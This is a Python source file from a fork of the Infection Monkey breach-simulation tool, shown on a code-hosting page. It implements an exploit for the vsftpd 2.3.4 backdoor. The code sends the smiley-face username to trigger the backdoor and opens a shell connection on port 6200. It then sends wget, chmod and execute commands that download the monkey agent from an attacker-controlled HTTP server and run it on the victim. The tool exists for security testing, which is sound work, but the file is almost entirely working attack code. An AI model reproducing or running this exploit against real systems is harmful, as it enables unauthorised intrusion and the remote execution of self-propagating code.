p15693087
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests 1 Projects Releases Wiki Activity
monkey/monkey/infection_monkey/exploit/vsftpd.py

121 lines
4.6 KiB
Python
Raw Blame History

import StringIO
import logging
import paramiko
import socket
import time
from common.utils.exploit_enum import ExploitType
from infection_monkey.exploit import HostExploiter
from infection_monkey.exploit.tools import build_monkey_commandline
from infection_monkey.exploit.tools import get_target_monkey, HTTPTools, get_monkey_depth
from infection_monkey.model import MONKEY_ARG
from infection_monkey.network.tools import check_tcp_port
from logging import getLogger
LOG = getLogger(__name__)
__author__ = 'D3fa1t'
FTP_PORT = 21
TRANSFER_UPDATE_RATE = 15
USERNAME = b'USER letmein:)\n'
PASSWORD = b'PASS please\n'
class VSFTPDExploiter(HostExploiter):
_TARGET_OS_TYPE = ['linux']
def __init__(self, host):
self._update_timestamp = 0
super(VSFTPDExploiter, self).__init__(host)
self.skip_exist = self._config.skip_exploit_if_file_exist
def exploit_host(self):
try:
LOG.info('Attempting to trigger backdoor...')
ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ftp_socket.connect((self.host.ip_addr, FTP_PORT))
ftp_socket.recv(128).decode('utf-8')
# Attempt to login to trigger backdoor
ftp_socket.send(USERNAME)
ftp_socket.recv(128).decode('utf-8')
ftp_socket.send(PASSWORD)
time.sleep(1)
ftp_socket.close()
LOG.info('Triggered backdoor')
except socket.error as e:
LOG.error('Failed to trigger backdoor on %s' , self.host.ip_addr)
try:
LOG.info('Attempting to connect to backdoor...')
backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
backdoor_socket.connect((self.host.ip_addr, 6200))
LOG.info('Connected to backdoor on %s:6200', self.host.ip_addr)
command = str.encode("uname -m" + '\n')
backdoor_socket.send(command)
response = backdoor_socket.recv(128).decode('utf-8')
LOG.info('Response for uname -m: %s', response)
if '' != response.lower().strip():
#command execution is successful
self.host.os['machine'] = response.lower().strip()
self.host.os['type'] = 'linux'
else :
LOG.info("Failed to execute command uname -m on victim %r ",self.host)
src_path = get_target_monkey(self.host)
LOG.info("src for suitable monkey executable for host %r is %s", self.host,src_path)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", self.host)
return False
LOG.info('Connected to backdoor on %s:6200', self.host.ip_addr)
#copy the monkey into the machine
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
dropper_target_path_linux = self._config.dropper_target_path_linux
LOG.info("Download link for monkey is %s",http_path)
#download the monkey
download_command = '/usr/bin/wget %s -O %s;' % (
http_path, dropper_target_path_linux)
LOG.info("Download_command is %s",download_command)
command = str.encode(str(download_command) + '\n')
backdoor_socket.send(command)
time.sleep(3) # wait till the file is downloaded
LOG.info("waiting 3 seconds for download to be completed")
#changeit to executable
execute_command = "/bin/chmod +x %s" % dropper_target_path_linux
LOG.info("Execute_command is %s",execute_command)
command = str.encode(str(execute_command) + '\n')
backdoor_socket.send(command)
#run the monkey
cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1)
cmdline += "&"
command = str.encode(str(cmdline) + '\n')
backdoor_socket.send(command)
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
self._config.dropper_target_path_linux, self.host, cmdline)
self._exploit_info['Vulnerability'] = {"Success":"True"}
except socket.error as e:
LOG.error('Failed to connect to backdoor on %s:6200', self.host.ip_addr)
LOG.error('Error Connecting to backdoor. Error: %s' % e)
return False
return True
Reference in New Issue View Git Blame Copy Permalink